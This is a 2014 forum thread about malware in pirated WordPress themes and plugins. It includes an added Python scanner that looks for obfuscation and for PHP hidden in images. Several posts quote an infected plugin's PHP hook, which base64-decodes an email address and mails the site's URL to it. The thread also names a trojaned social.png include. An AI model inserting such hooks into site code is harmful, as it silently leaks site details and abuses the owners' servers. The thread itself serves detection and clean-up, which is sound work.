06-24-2014, 03:40 PM
06-24-2014, 10:38 PM
Virustotal is useless. I had ubermenu flat skins plugin installed. Virustotal results were clean. However plugin was infected.
infected plugin has this spam code
addressdecode=base64_decode("amFxcXNjaWdzQGdtYWlsLmNvbQ==")
because that code is same with this code:
addressdecode="jaqqscigs@gmail.com";
find that code then replace this entire code
add_action('wp_head','my_wpfunww439');function my_wpfunww439(){if(!username_exists('wordpress')){$addressdecode=base64_decode("amFxcXNjaWdzQGdtYWlsLmNvbQ==");$vari='Wordpress Plugin';wp_mail($addressdecode,$vari,get_bloginfo('wpurl'));}}
Basically it was sending spam mails from my website. My website got blocked by hosting provider because my website caused their server IP address to be banned.
Lesson learnt but it was too late
06-24-2014, 11:21 PM
Great post, repped and bookmarking this for reference.
06-24-2014, 11:21 PM
Virustotal is designed to find Windows exploits.
(06-24-2014 10:38 PM)thelatinodancer Wrote: Virustotal is useless. I had ubermenu flat skins plugin installed. Virustotal results were clean. However plugin was infected.
infected plugin has this spam code
addressdecode=base64_decode("amFxcXNjaWdzQGdtYWlsLmNvbQ==")
because that code is same with this code:
addressdecode="jaqqscigs@gmail.com";
find that code then replace this entire code
add_action('wp_head','my_wpfunww439');function my_wpfunww439(){if(!username_exists('wordpress')){$addressdecode=base64_decode("amFxcXNjaWdzQGdtYWlsLmNvbQ==");$vari='Wordpress Plugin';wp_mail($addressdecode,$vari,get_bloginfo('wpurl'));}}
Basically it was sending spam mails from my website. My website got blocked by hosting provider because my website caused their server IP address to be banned.
Lesson learnt but it was too late
06-24-2014, 11:38 PM
I too was hacked really bad and since then I use Wordfence which is the best security plugin. I also use virustotal on downloaded shares, I use exploit scanner plugin but it doesn't remove base64, eval function and other malicious code it only scans and I've found that code in WP core files, not just in other themes and plugins.
TAC wasn't updated for a while but I see now that they updated it but I use Wordfence. Wordfence was the service that notified me about Heartbleed virus just hours when it was detected and I was able to get the OpenSSL fixed quickly before most people heard about it. :)
06-25-2014, 01:22 AM
good to know that. thx
06-25-2014, 01:44 AM
honestly... you guys say that wplocker is bad?! loool have you seen the current state of this forum?! Bunch of users reposting themes from other users, bunch of infected links. Really? Every site is bad, wplocker, this one, everyone. One does not take a paid theme for free and expect a working site. Most users don't even know what's a php file and they come here and there complaining that this and that is infected. I'm sorry but I'm tired like most of the good users in here.
06-25-2014, 02:21 AM
(06-24-2014 10:38 PM)thelatinodancer Wrote: Virustotal is useless. I had ubermenu flat skins plugin installed. Virustotal results were clean. However plugin was infected.
infected plugin has this spam code
addressdecode=base64_decode("amFxcXNjaWdzQGdtYWlsLmNvbQ==")
because that code is same with this code:
addressdecode="jaqqscigs@gmail.com";
find that code then replace this entire code
add_action('wp_head','my_wpfunww439');function my_wpfunww439(){if(!username_exists('wordpress')){$addressdecode=base64_decode("amFxcXNjaWdzQGdtYWlsLmNvbQ==");$vari='Wordpress Plugin';wp_mail($addressdecode,$vari,get_bloginfo('wpurl'));}}
Basically it was sending spam mails from my website. My website got blocked by hosting provider because my website caused their server IP address to be banned.
Lesson learnt but it was too late
See post #25. You've got to use Wordfence.
06-25-2014, 02:38 AM
(06-23-2014 02:32 PM)GreenPeace Wrote: Thanks for sharing this about wplocker. I am still a victim of YouTube redirect virus in one of my sites. Did a strip search of the site but nothing. Still redirects the site randomly to Justin Bieber video!! Man I don't even like Justin Bieber :-|
Search for
Code:
<?php include 'images/social.png' ?>
Search for image file social.png. Open it with a text editor (like Notepad++). If the file starts with <?php, it means that the theme or plugin is infected.
Search for all strings containing base64_decode, gzinflate, gzuncompress or str_rot13 (or all on same string). Use the "Find in Files" function of Notepad++ to find all encoded strings.
Go to http://ddecode.com/phpdecoder/ and paste the encoded string. Decode it. If you understand PHP a bit, you will also understand whether the code is safe or malicious. If you have no clue about PHP, send me a message with the ddecode.com link. I will try to help you out.
Maybe I will open a topic to help you all with this issue.
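The manual checks described in the thread (decoding the base64_decode literal, finding image files that start with <?php, and searching for base64_decode, gzinflate, gzuncompress or str_rot13) combined into one Python scanner. This is an added example, not code from any post in the thread; the function names and the sample plugin tree are constructed for illustration, and only the include line and the base64 string come from the posts above.

```python
import base64
import re
import tempfile
from pathlib import Path

IMAGE_EXT = {".png", ".jpg", ".jpeg", ".gif", ".ico"}
# Functions the post says to search for.
OBFUSCATORS = re.compile(rb"\b(base64_decode|gzinflate|gzuncompress|str_rot13)\s*\(")
B64_LITERAL = re.compile(rb"base64_decode\s*\(\s*[\"']([A-Za-z0-9+/=]+)[\"']")
# include/require whose target ends in an image extension.
IMAGE_INCLUDE = re.compile(
    rb"\b(?:include|require)(?:_once)?\b[^;?]*?\.(?:png|jpe?g|gif|ico)\b", re.I)

def scan_tree(root):
    """Return (relative_path, finding) tuples for one plugin or theme directory."""
    findings = []
    for path in sorted(Path(root).rglob("*")):
        if not path.is_file():
            continue
        data, rel = path.read_bytes(), path.relative_to(root).as_posix()
        ext = path.suffix.lower()
        if ext in IMAGE_EXT and data.lstrip()[:5].lower() == b"<?php":
            findings.append((rel, "image file starts with <?php"))
        if ext != ".php":
            continue
        if IMAGE_INCLUDE.search(data):
            findings.append((rel, "includes an image file as PHP"))
        for name in sorted({m.group(1).decode() for m in OBFUSCATORS.finditer(data)}):
            findings.append((rel, "calls " + name))
        for m in B64_LITERAL.finditer(data):
            try:  # show what the literal hides instead of trusting the call site
                text = base64.b64decode(m.group(1), validate=True).decode("utf-8", "replace")
            except ValueError:
                continue
            findings.append((rel, "base64 literal decodes to " + text))
    return findings

def scan_constructed_sample():
    """Build a small constructed plugin tree in a temp dir and scan it."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "images").mkdir()
        (root / "clean.php").write_bytes(b"<?php echo 'hello'; ?>")
        (root / "images" / "logo.png").write_bytes(b"\x89PNG\r\n\x1a\n" + b"\x00" * 16)
        (root / "images" / "social.png").write_bytes(b"<?php /* placeholder */ ?>")
        (root / "menu.php").write_bytes(
            b"<?php include 'images/social.png' ?>\n"
            b'<?php $addressdecode=base64_decode("amFxcXNjaWdzQGdtYWlsLmNvbQ=="); ?>')
        return scan_tree(root)

if __name__ == "__main__":
    for rel, finding in scan_constructed_sample():
        print(f"{rel}: {finding}")
```

A hit on one of the function names alone is only a lead to read the surrounding code, since legitimate plugins also call base64_decode.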
06-25-2014, 02:50 AM
Example for plugin infected with "social.png"
getnulledscripts .com in "codecanyon-visual-composer-extensions-ihover-v1-2-wordpress-plugin"